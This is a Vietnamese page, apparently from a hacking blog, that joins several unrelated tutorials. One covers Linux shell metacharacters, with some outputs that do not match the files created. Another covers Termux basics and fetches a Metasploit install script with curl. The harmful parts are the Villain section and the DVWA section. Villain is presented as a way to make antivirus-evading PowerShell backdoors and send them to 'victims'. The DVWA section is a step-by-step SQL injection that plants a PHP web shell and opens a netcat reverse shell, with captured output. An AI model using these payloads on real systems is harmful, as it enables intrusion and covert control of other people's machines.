Các siêu ký tự rất hữu ích trong việc liệt kê, xóa và sao chép các tệp trên Linux. Tuy nhiên, chức năng của mỗi siêu ký tự khác nhau tùy thuộc vào lệnh bạn đang sử dụng.

Bài viết này cung cấp kiến thức chuyên sâu về các loại siêu ký tự khác nhau trong Linux. Và mình sẽ giải thích cách các ký tự đặc biệt này giúp kết nối và mở rộng các lệnh.

Xử lý File với siêu ký tự

Linux shell cho phép bạn lưu các lần gõ phím khi nhập lệnh bằng cách sử dụng siêu ký tự giữa các tệp hoặc tên thư mục. Những ký tự này giúp bạn tham chiếu đến một nhóm tệp hoặc một thư mục để liệt kê, di chuyển hoặc thực hiện các hành động khác.

Đây là một số siêu ký tự trong Linux Shell:

• * (Dấu hoa thị): Khớp một hoặc nhiều lần xuất hiện của một ký tự
• ? (Dấu chấm hỏi): Khớp một ký tự đơn lẻ hoặc một lần xuất hiện mẫu
• [] (Dấu ngoặc vuông): Khớp với bất kỳ số, ký hiệu hoặc bảng chữ cái được phân tách bằng dấu gạch ngang nào được chỉ định bên trong dấu ngoặc vuông

Một cách lý tưởng để thực hành siêu ký tự trong Linux là tạo một thư mục trống mới bên trong thư mục /tmp.

sudo mkdir /tmp/meta

Bây giờ truy cập vào thư mục /tmp/meta bằng lệnh cd và tạo các tệp trống mới bằng cách sử dụng lệnh touch:

touch apple.txt cider.sh vinegar.php cat.txt lemon.txt juice.sh catfish.sh

Sử dụng các lệnh sau để kiểm tra siêu ký tự “*” và hiển thị kết quả đầu ra:

ls c*
Output:
catfish.sh cat.txt cider.sh

ls c*h
Output:
catfish.sh cider.sh

ls *r*
Output:
cider.sh vinegar.php

sudo rm *p*

Lệnh trên sẽ xóa tất cả các tệp có chứa ký tự “p” trong tên của nó. Bạn có thể xác nhận thay đổi bằng lệnh ls:

ls
Output:
catfish.sh cat.txt cider.sh juice.sh lemon.txt

ls a?*
Output:
apple.txt

ls c?t*
Output:
catfish.sh cat.txt

ls [av]*
Output:
apple.txt vinegar.sh

ls [ac]*[t]
Output:
apple.txt catfish.txt cat.txt

ls [a-j]*
Output:
apple.txt catfish.sh cat.txt cider.sh juice.sh

sudo mkdir /tmp/brace; cd /tmp/brace
touch test{1,2,3,4,5}

ls
Output:
test1 test2 test3 test4 test5

touch {apple,cider,vinegar}.{fruit,liquid,sour}
touch {a,b,c}.{1,2,3}

Câu hỏi thường gặp

Siêu ký tự * và ? khác nhau như thế nào?

Siêu ký tự * khớp với một hoặc nhiều ký tự bất kỳ, trong khi ? chỉ khớp với một ký tự duy nhất. Ví dụ, ls c* sẽ liệt kê tất cả file bắt đầu bằng “c”, còn ls c?t sẽ chỉ liệt kê các file bắt đầu bằng “c”, tiếp theo là một ký tự bất kỳ và kết thúc bằng “t”.

Làm thế nào để sử dụng siêu ký tự [] để lọc file?

Siêu ký tự [] cho phép bạn khớp với một tập hợp các ký tự cụ thể. Ví dụ, ls [abc]* sẽ liệt kê tất cả các file bắt đầu bằng “a”, “b”, hoặc “c”. Bạn cũng có thể sử dụng dấu gạch ngang để chỉ định một phạm vi, ví dụ ls [a-z]* sẽ liệt kê tất cả các file bắt đầu bằng một chữ cái thường.

Siêu ký tự chuyển hướng > và >> khác nhau ra sao?

Siêu ký tự > sẽ ghi đè nội dung của một file nếu file đó đã tồn tại. Trong khi đó, >> sẽ thêm nội dung vào cuối file hiện có mà không làm mất đi dữ liệu cũ.

Lưu ý: Bài viết chỉ dành cho mục đích nghiên cứu, mọi hành vi bất hợp pháp gây ra Anonyviet không chịu toàn bộ trách nhiệm đó

Villain – Công cụ chiếm quyền Shell Windows và Linux

Villain là một công cụ tạo backdoors Windows và Linux và có một chức năng mình khá thích đó là công cụ này có thể kết nối 2 hoặc nhiều máy lại với nhau để làm việc, nó giống như 2 hoặc nhiều hacker chiếm quyền điều khiển 1 hệ thống nào đó.

Công cụ được làm bởi tác giả t3l3machus là người kiểm tra thâm nhập và cũng là nhà nghiên cứu an ninh mạng. Không chỉ vậy, tool Villain được lấy ý tưởng từ tool Hoaxshell . Villain được viết hoàn toàn bằng ngôn ngữ Python3 và cách sử dụng cũng khá đơn giản cho người dùng. Villain được tích hợp sẵn chức năng auto-obfuscate payload để hỗ trợ người dùng vượt qua AntiVirus (dành cho payload của Windows). Do đó, payload không bị phát hiện (tại thời điểm hiện tại). Những payload do Villain tạo ra đều đc viết bằng ngôn ngữ Powershell.

Cách cài đặt và sử dụng Villain

Để cài đặt tool thì bạn hãy mở terminal lên và nhập các lệnh sau:

git clone https://github.com/t3l3machus/Villain
cd Villain
pip install -r requirements.txt hoặc pip3 install -r requirements.txt

Sau khi thực hiện bước trên, bây giờ bạn hãy khởi động tool qua lệnh sau:

python Villain.py hoặc python3 Villain.py (tùy thuộc vào phiên bản Python mà bạn đang sử dụng)

Bây giờ, bạn nhập câu lệnh help để xem hướng dẫn, để tạo được backdoors thì đầu tiên bạn cần chú ý đến lệnh generate nghĩa là tạo, còn os= mình sẽ  chiếm quyền Shell Windows nên mình sẽ chọn hệ điều hành là windows còn bạn muốn chọn Linux thì hãy nhập os=linux tiếp theo là lhost= bạn sẽ nhập địa chỉ IP hoặc là interface mà bạn đang sử dụng, ở đây mình sẽ nhập interface là lhost=ens33 tiếp đến là obfuscate từ khóa này sẽ làm xáo trộn code virus nhằm bypass AntiVirus

Sau khi hoàn thành các bước trên, việc của bạn bây giờ nhấn enter để tool tự động tạo ra một đoạn code, đoạn code này khi được thực thi trên máy nạn nhân thì nó sẽ tự động chạy ngầm và gửi thông báo về cho hacker là đã chiếm quyền shell thành công.

Bạn chỉ cần copy đoạn code đó và mở Powershell lên chạy thử xem sao nhé, ngoài ra bạn có thể tạo ra 1 file .ps1 rồi paste đoạn code đó vào sau đó gửi cho nạn nhân hoặc là đính kèm vào file gì đó tùy các bạn, nên nhớ là không gây hành vi bất hợp nhé. Giờ mình sẽ mở Powershell lên và paste nó vào chạy thử xem sao ^^.

Như kết quả hình bên dưới thì Villain đã gửi thông báo là backdoors đã được thực thi trên máy của nạn nhân

Để điều khiển máy tính nạn nhân thì bạn làm như sau, đầu tiên nhập lệnh sessions đây là câu lệnh sẽ show ra các máy đã bị chiếm quyền . Bạn thấy rằng, Sessions ID là ID máy nạn nhân, tiếp đến là địa chỉ IP, hệ điều hành, tên user. và bây giờ để bắt đầu điều khiển shell thì chúng ta nhập sessions <session id máy nạn nân>

ví dụ như là: shell jhjadbae-823cgfsa-8263hfvd-shfvd678

Video demo về tool Villain: https://youtu.be/NqZEmBsLCvQ

Bài viết đến đây là đã hết rồi, chúc các bạn có một ngày tốt lành!

Câu hỏi thường gặp

Villain là gì và nó hoạt động như thế nào?

Villain là một công cụ mã nguồn mở được viết bằng Python, cho phép tạo backdoor trên hệ điều hành Windows và Linux. Nó tạo ra payload (mã độc) tự động được mã hóa để vượt qua một số phần mềm diệt virus, cho phép hacker chiếm quyền điều khiển máy tính nạn nhân từ xa.

Tôi có thể sử dụng Villain để làm gì?

Villain được thiết kế cho mục đích nghiên cứu an ninh mạng. Việc sử dụng nó cho các hoạt động bất hợp pháp là vi phạm pháp luật và không được khuyến khích. Chỉ sử dụng công cụ này trong môi trường được phép và có sự đồng ý của chủ sở hữu hệ thống.

Payload được tạo bởi Villain có khả năng vượt qua tất cả các phần mềm diệt virus không?

Không. Mặc dù Villain có chức năng tự động mã hóa payload để tăng khả năng vượt qua phần mềm diệt virus, nhưng không có gì đảm bảo nó sẽ hiệu quả 100%. Khả năng phát hiện của phần mềm diệt virus liên tục được cập nhật.

Termux là gì?

Trong mọi hệ điều hành trên máy tính, bạn có thể sử dụng công cụ dòng lệnh (Terminal/CMD) để điều khiển máy tính. Nhưng để truy cập công cụ dòng lệnh trên Android bạn cần phải dùng ứng dụng Termux.

Bạn có thể xem bài hướng dẫn Termux căn bản:  Cách dùng Termux để cài phần mềm Hack trên điện thoại Android.

Các lệnh cơ bản trên Termux

Các ứng dụng như Termux cũng cho phép mọi người liệt kê các Subdomain rất dễ dàng bằng cách sử dụng các công cụ có sẵn như Knockpy.

Chúng ta sẽ thấy một số lệnh cơ bản để sử dụng trong ứng dụng termux.

Cập nhật phiên bản Termux

apt update

Kiểm tra xem termux đã được cài đặt đúng chưa

pkg install sl

Kiểm tra các tiến trình đang chạy

top

Hiển thị chữ đẹp hơn

apt install figlet

figlet anyword

Bạn sẽ thấy giao diện theo một phong cách khác.

Tạo ảnh nền Ma trận trên Termux

apt install cmatrix

cmatrix

Chuyển đến giao diện shell dễ sử dụng hơn

apt install fish

fish

Lệnh Fish tự động hoàn thành các lệnh. Nhập exit thoát

Xem giao diện trong phong cách đầy màu sắc

apt install toilet

toilet -f mono12 -F green BugBounty

Để mở bất kỳ trang web nào trong termux

apt install w3m

w3m anonyviet.com

Cài đặt Metasploit trong Termux

Đầu tiên, cài đặt curl

pkg install curl

sau đó:

curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh

Cấp quyền truy cập

chmod 777 metasploit.sh

./metasploit.sh

Theo cách tương tự, bạn có thể cài đặt các thêm gói tùy theo nhu cầu của mình. Có rất nhiều gói Termux có sẵn trên Github mà bạn có thể dễ dàng cài đặt và cấu hình.

Câu hỏi thường gặp

Termux là gì và tại sao tôi nên sử dụng nó?

Termux là một trình giả lập terminal Linux mạnh mẽ cho Android. Nó cho phép bạn sử dụng các lệnh dòng lệnh quen thuộc, cài đặt và chạy các ứng dụng Linux, mở rộng khả năng của thiết bị Android.

Làm thế nào để cập nhật Termux và kiểm tra xem nó đã được cài đặt đúng chưa?

Để cập nhật, sử dụng lệnh apt update. Để kiểm tra cài đặt, dùng lệnh pkg install sl; nếu thấy một hoạt ảnh tàu hỏa, nghĩa là Termux đã được cài đặt thành công.

Tôi có thể làm gì với lệnh figlet và toilet?

figlet tạo ra văn bản nghệ thuật ASCII, trong khi toilet tạo ra văn bản nghệ thuật ASCII với nhiều kiểu chữ và màu sắc hơn, làm cho đầu ra trên terminal hấp dẫn hơn.

Mình sẽ sử dụng DVWA, một máy ảo dễ bị tấn công và Kali Linux để thực hiện cuộc tấn công. Nếu bạn là người mới sử dụng Kali, bạn nên đọc bài này để biết cách thiết lập và bảo mật Kali, để đảm bảo hệ thống của bạn đã sẵn sàng cho mọi thứ.

Tổng quan về SQL Injection

SQL injection là một trong những lỗ hổng phổ biến nhất gặp phải trên web và cũng có thể là một trong những lỗ hổng nguy hiểm nhất. Những kẻ tấn công có thể tiêm các mã SQL độc hại vào để trích xuất thông tin nhạy cảm, sửa đổi hoặc phá hủy dữ liệu hiện có hoặc leo thang cuộc tấn công nhằm chiếm hữu máy chủ.

Có nhiều kiểu tiêm SQL khác nhau và các phương pháp tấn công khác nhau cho các hệ thống cơ sở dữ liệu khác nhau đang được sử dụng. Mặc dù kiểu tấn công này là một trong những kiểu tấn công dễ bắt đầu học nhất, nhưng bạn vẫn có thể mất vài năm để thành thạo SQL injection.

Bước 1: Thăm dò mục tiêu

Điều đầu tiên chúng ta cần làm là đăng nhập vào DVWA bằng thông tin đăng nhập mặc định, admin là tên người dùng và mật khẩu là password.

Tiếp theo, chuyển đến tab “Security” ở bên trái và đặt mức bảo mật thành “low”. Điều này sẽ đảm bảo cuộc tấn công của chúng ta sẽ diễn ra suôn sẻ.

Điều hướng đến trang “SQL Injection” để bắt đầu cuộc tấn công. Chúng ta có thể thấy rằng chức năng của trang là lấy ID người dùng và trả lại thông tin, trong trường hợp này là họ và tên.

Mình  muốn xác minh rằng đầu vào này thực sự dễ bị tiêm SQL. Điều đầu tiên cần thử là chỉ cần nhập một dấu ngoặc kép duy nhất, điều này sẽ đóng câu lệnh nếu hệ thống thực sự dễ bị tấn công. Và khi mình làm như vậy thì hệ thống trả về lỗi, thậm chí còn cho chúng ta biết cụ thể rằng trang web đang sử dụng MySQL làm cơ sở dữ liệu. Tại thời điểm này, rất có thể chúng ta đã tìm thấy một điểm vào dễ bị tấn công.

Điều tiếp theo chúng ta cần làm là liệt kê cơ sở dữ liệu và xác định số cột đang sử dụng. Điều này sẽ cho phép chúng ta khai thác một cách đáng tin cậy lỗ hổng dựa trên union chỉ trong một chút. Để hiểu rõ hơn, chúng ta hãy xem lệnh truy vấn sẽ trông như thế nào trong quá trình gửi đầu vào bình thường:

select first_name, surname from users where user_id='';

Đây có thể là truy vấn trên backend, với first_name và surname là các cột được chọn, tổng cộng là hai cột. Nhưng chúng ta cần biết chắc chắn để lỗ hổng này hoạt động. Chúng ta có thể sử dụng order by.

Mệnh đề này sẽ sắp xếp các kết quả của truy vấn theo các cột. Vì chúng ta khá chắc chắn rằng có ít nhất hai cột đang được sử dụng, nếu chúng ta sẽ sắp xếp theo thứ tự 1 hoặc 2, truy vấn sẽ thành công. Nhưng nếu chúng ta muốn order by 3 thì sao? Nếu chúng ta đúng, thì truy vấn này sẽ xuất hiện lỗi.

Gửi lần tiêm sau làm đầu vào, và nó sẽ dẫn đến lỗi. Dấu thăng được sử dụng ở đây để comment phần còn lại của truy vấn để nó không gây ra bất kỳ lỗi cú pháp bổ sung nào.

' order by 3 #

Các bạn có thể thấy rằng chúng ta thực sự gặp lỗi, vì vậy bây giờ mình biết chắc chắn rằng chỉ có hai cột đang được sử dụng.

Bước 2: Truy cập Shell và khai thác lệnh

Bây giờ chúng ta đã có thêm một chút thông tin về cơ sở dữ liệu, chúng ta có thể sử dụng điều này làm lợi thế của mình để thực hiện việc tiêm SQL dựa trên union. Toán tử union được sử dụng trong SQL để kết hợp các kết quả của hai hoặc nhiều câu lệnh select, nhưng để nó hoạt động bình thường, các câu lệnh phải có cùng số cột. Đây là lý do tại sao chúng ta cần tìm hiểu backend sớm hơn.

Có rất nhiều điều chúng ta có thể làm với việc tiêm dựa trên union, nhưng trong bài này, chúng ta cần quan tâm đến việc tận dụng lỗ hổng này để chạy các lệnh hệ điều hành. Một trong những cách dễ nhất để thực hiện điều này là tải lên một shell PHP đơn giản để chuyển các lệnh của chúng ta qua.

Chúng ta cần xác định thư mục gốc của máy chủ web để tải shell. Tùy thuộc vào ứng dụng và loại máy chủ web đang sử dụng, thư mục gốc có thể khác nhau, đặc biệt nếu quản trị viên thay đổi vị trí mặc định hoặc có đủ quyền. Đối với mục đích của cuộc tấn công này, mình sẽ giả định rằng gốc web mặc định của Apache (/var/www/) đang được sử dụng với quyền ghi công khai. Thông tin về máy chủ web, bao gồm cả thư mục gốc, thường có thể được tìm thấy trong tệp “phpinfo.php”.

Chúng ta có thể sử dụng lệnh into outfile để ghi vào một tệp. Trong trường hợp này, chúng tasẽ chèn một tập lệnh PHP đơn giản để có thể chạy các lệnh hệ thống. Tập lệnh mà mình đặt tên là “cmd.php”, sẽ giống như sau:

<?php system($_GET["cmd"]); ?>

Bây giờ, chúng ta sẽ thực hiện tiêm (injection). Chúng ta sẽ cần sử dụng dấu ngoặc kép trong tập lệnh vì chúng ta cần đặt phần thứ hai của câu lệnh trong dấu nháy đơn – điều này sẽ tránh được lỗi cú pháp. Lệnh tiêm hoàn chỉnh sẽ giống như sau:

' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #

Nếu lệnh này hoạt động bình thường, chúng ta sẽ có thể truy cập shell của mình thông qua URL và bằng cách cung cấp lệnh hệ thống dưới dạng tham số. Ví dụ, whoami sẽ cung cấp cho chúng ta thông tin người dùng hiện tại.

Hoặc uname -a, sẽ cung cấp cho chúng ta thông tin về hệ thống.

Nhưng việc cung cấp tất cả các lệnh này thông qua tham số URL là một việc rất chán. Chúng ta có thể tận dụng việc này để đảo ngược shell và tiến xa hơn một bước.

Bước 3: Dịch ngược Shell với Netcat

Netcat là một tiện ích mạng mạnh mẽ được sử dụng để khắc phục sự cố kết nối, nhưng nó thực sự có thể bị tin tặc sử dụng như một backdoor và như một phương pháp để chiếm quyền shell. Rất nhiều bản phân phối Linux được cài đặt tiện ích này theo mặc định, vì vậy nếu chúng ta có thể truy cập công cụ này thì game over.

Trước tiên, mình sẽ cần thiết lập trình lắng nghe trên máy cục bộ của chúng ta. Sử dụng lệnh nc cùng với -lvp để chỉ định nó lắng nghe và để đặt số cổng tương ứng.

nc -lvp 1234
listening on [any] 1234 ...

Tiếp theo, với tư cách là tham số cho shell PHP trong URL, hãy nhập lệnh sau. Nó yêu cầu máy chủ thực thi một shell (-e/bin/sh) và gửi nó trở lại máy cục bộ của chúng ta. Bạn cần đảm bảo sử dụng địa chỉ IP và cổng thích hợp.

nc 172.16.1.100 1234 -e /bin/sh

Hãy đợi một vài giây và chúng ta sẽ thấy trình nghe của chúng ta bắt được shell và mở một kết nối. Từ đây, chúng ta có thể chạy các lệnh như id, uname -a và ps.

connect to [172.16.1.100] from (UNKNOWN) [172.16.1.102] 47643
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
ps
  PID TTY          TIME CMD
 4665 ?        00:00:00 apache2
 4669 ?        00:00:00 apache2
 4671 ?        00:00:00 apache2
 4673 ?        00:00:00 apache2
 4674 ?        00:00:00 apache2
 4803 ?        00:00:00 apache2
 4810 ?        00:00:00 apache2
 4914 ?        00:00:00 php
 4915 ?        00:00:00 sh
 4919 ?        00:00:00 ps

Giờ đây, chúng ta đã có đủ phương tiện để thực thi các lệnh trên máy chủ web từ terminal của chính chúng ta, tất cả đều xuất phát từ một lỗ hổng SQL injection đơn giản. Mình mong qua bài viết thực tế này sẽ giúp bạn tiếp thu nhiều kiến thức hơn.

Câu hỏi thường gặp

SQL Injection là gì và tại sao nó nguy hiểm?

SQL Injection là một kỹ thuật tấn công mạng cho phép kẻ xấu đưa mã SQL độc hại vào đầu vào của ứng dụng web, nhằm mục đích truy xuất, sửa đổi hoặc xóa dữ liệu, thậm chí chiếm quyền điều khiển máy chủ. Sự nguy hiểm nằm ở khả năng leo thang quyền hạn và truy cập trái phép vào hệ thống.

Làm thế nào để SQL Injection có thể dẫn đến việc chiếm quyền Shell?

Bằng cách khai thác lỗ hổng SQL Injection, kẻ tấn công có thể thực thi các lệnh hệ điều hành trên máy chủ. Điều này thường được thực hiện bằng cách chèn mã lệnh (ví dụ: mã PHP) vào cơ sở dữ liệu, sau đó truy cập và thực thi mã đó thông qua một URL, cho phép kẻ tấn công chiếm quyền điều khiển máy chủ.

Tôi có thể làm gì để bảo vệ hệ thống của mình khỏi SQL Injection?

Sử dụng các kỹ thuật lập trình an toàn như chuẩn bị câu lệnh (prepared statements), nhập liệu được lọc kỹ càng và tránh sử dụng các hàm có nguy cơ tiêm SQL. Cập nhật thường xuyên các hệ thống và phần mềm cũng rất quan trọng để vá các lỗ hổng bảo mật.

Trong bài viết này, bạn sẽ được tìm hiểu các kiến ​​thức cơ bản về chương trình Linux/Unix shell scripting đến các khái niệm nâng cao về Shell Scripting. Bài viết được thiết kế cho người mới bắt đầu và các chuyên gia muốn tìm hiểu Shell Scripting là gì? Cách hoạt động của shell scripting, các loại shell và nhiều thứ khác nữa.

Shell là gì?

Shell là một thuật ngữ UNIX chỉ giao diện giữa người dùng và dịch vụ (service) hệ điều hành. Shell cung cấp cho người dùng một giao diện và chấp nhận các lệnh mà người dùng đưa vào hệ thống và thực thi các lệnh đó tự động, cung cấp kết quả của chương trình trong một tập lệnh shell.

Một hệ điều hành được tạo ra từ nhiều thành phần, nhưng hai thành phần chính của nó là:

• Kernel
• Shell

Kernel là hạt nhân của máy tính. Nó giúp hệ thống có thể giao tiếp giữa phần cứng và phần mềm. Trong khi Kernel là phần trong cùng của hệ điều hành, thì shell là phần ngoài cùng.

Shell trong hệ điều hành Linux nhận đầu vào từ phía client dưới dạng lệnh, xử lý nó và sau đó xuất kết quả đầu ra. Nó là giao diện mà thông qua đó người dùng có thể làm việc trên các chương trình, lệnh và tập lệnh. Shell được truy cập bằng terminal.

Khi bạn chạy terminal, Shell đưa ra một dấu nhắc lệnh (thường là $), nơi bạn có thể nhập lệnh, sau đó sẽ được thực thi khi bạn nhấn phím Enter. Đầu ra hoặc kết quả sau đó sẽ được hiển thị trên terminal.

Shell bao bọc xung quanh phần bên trong mỏng manh của Hệ điều hành, bảo vệ hệ điều hành khỏi bị hư hỏng do tai nạn. Do đó nó có tên gọi là Shell.

Các loại shell

Có hai loại shell chính trong Linux:

1. Bourne Shell: Dấu nhắc cho shell này là $ và các shell con gồm:
   • POSIX shell còn được gọi là sh
   • Korn Shell cũng được gọi là sh
   • Bourne Again Shell còn được gọi là bash (phổ biến nhất)
2. C shell: Dấu nhắc cho shell này là% và các loại khác nhau như
   • C shell còn được gọi là csh
   • Top C shell còn được gọi là tcsh

Chúng ta sẽ thảo luận về shell scripting dựa trên bash shell trong bài viết này.

Cách viết Shell Script trong Linux/Unix

Shell Scripts được viết bằng các text editors (trình soạn thảo văn bản). Trên hệ thống Linux, hãy mở một chương trình editors, mở một tệp mới để bắt đầu nhập tập lệnh shell hoặc lập trình shell, sau đó cấp quyền cho shell để thực thi shell script và đặt tập lệnh của bạn tại vị trí mà shell có thể tìm thấy.

Các bước tạo Shell Script:

1. Tạo tệp bằng vi editor (hoặc bất kỳ trình chỉnh sửa văn bản nào khác). Đặt tên cho tệp script phải có đuôi là .sh
2. Bắt đầu script bằng #! /bin/sh
3. Viết một vài dòng code
4. Lưu file script dưới dạng filename.sh
5. Thực thi file script bằng lệnh bash filename.sh

“#!” là một toán tử được gọi là shebang hướng tập lệnh đến vị trí trình thông dịch. Vì vậy, nếu chúng ta sử dụng “#! /bin/sh”, tập lệnh sẽ được chuyển hướng đến bourne-shell.

Hãy tạo một script nhỏ:

#!/bin/sh
ls

Các bước để tạo chương trình Shell Script trong Linux / Unix:

Lệnh ‘ls’ được thực thi khi chúng ta thực thi file scrip sample.sh.

Thêm shell comments

Commenting là yếu tố rất quan trọng trong bất kỳ chương trình nào. Trong lập trình Shell, cú pháp để thêm comments là, nội dung sau dấu # sẽ không có giá trị, mục đích là giải thích code của tác giả.

#comment

Biến trong Shell là gì?

Như đã thảo luận trước đó, biến lưu trữ dữ liệu dưới dạng ký tự và số. Tương tự, các biến Shell được sử dụng để lưu trữ thông tin và chúng chỉ hoạt động trong shell.

Ví dụ: tạo một biến shell và sau đó in nó ra:

variable ="Hello"
echo $variable

Dưới đây là một script nhỏ sẽ sử dụng biến:

#!/bin/sh
echo "what is your name?"
read name
echo "How do you do, $name?"
read remark
echo "I am $remark too!"

Các bước tạo và thực thi script:

Như bạn thấy, chương trình đã chọn giá trị của biến ‘name’ là “Joy” và ‘remark’ là “excellent”.

Đây là một script đơn giản. Bạn có thể phát triển các script nâng cao chứa các câu lệnh, vòng lặp và hàm có điều kiện. Shell Script sẽ giúp cho cuộc sống của bạn và việc quản trị Linux trở nên dễ dàng hơn.

Câu hỏi thường gặp

Shell script là gì và tại sao tôi nên sử dụng nó?

Shell script là một tập lệnh gồm các lệnh Unix/Linux được viết trong một file văn bản. Nó cho phép bạn tự động hóa các tác vụ lặp lại, kết hợp nhiều lệnh thành một, và tăng hiệu quả công việc quản trị hệ thống.

Tôi cần những công cụ gì để viết shell script?

Bạn chỉ cần một trình soạn thảo văn bản (như vi, nano, gedit) để viết script và một terminal để thực thi nó. Hệ điều hành Linux/Unix đã tích hợp sẵn các công cụ cần thiết.

Làm thế nào để chạy một shell script?

Sau khi lưu script với đuôi .sh, bạn cần cấp quyền thực thi bằng lệnh chmod +x your_script.sh và sau đó chạy nó bằng lệnh ./your_script.sh.